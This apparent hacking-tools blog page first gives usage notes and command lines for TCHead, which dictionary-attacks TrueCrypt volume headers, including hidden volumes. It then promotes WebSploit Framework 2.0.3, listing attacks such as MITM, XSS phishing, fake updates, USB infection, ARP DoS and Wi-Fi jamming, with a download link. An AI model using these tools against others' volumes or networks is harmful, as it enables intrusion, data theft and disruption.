Brute-force TrueCrypt : However, TrueCrypt passwords go through many iterations and are strengthened. Cracking them takes time. Very strong passwords will not be cracked. Also, in addition to trying multiple passwords an attacker must try each password against each combination of hash and cipher (assuming they do not know what these are beforehand). System encrypted hard drives use only one hash and cipher, so attacking those is faster.
Testing TCHead: Create a TrueCrypt volume using the default hash and cipher (RIPEMD-160 and AES), set the password to "secret", then run TCHead against it like this and it will decrypt the header (provided that the word "secret" is in the word list)
Command : TCHead -f name_of_volume.tc -P words.txt
Decrypt hidden volumes:
Command : TCHead -f name_of_volume.tc -P words.txt --hidden
Multiple passwords (brute-force): Create or download a list of words in a text file (one word per line) using words that you think are likely to decrypt the header, then run TCHead against it like this. If the correct password is found, the header will be decrypted:
Command : TCHead -f name_of_volume.tc -P words.txt

[WebSploit] Framework 2.0.3 with Wifi Jammer

WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability.

WebSploit+Framework+2.0.3+with+Wifi+Jammer

WebSploit Is An Open Source Project For :
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

Download WebSploit Framework 2.0.3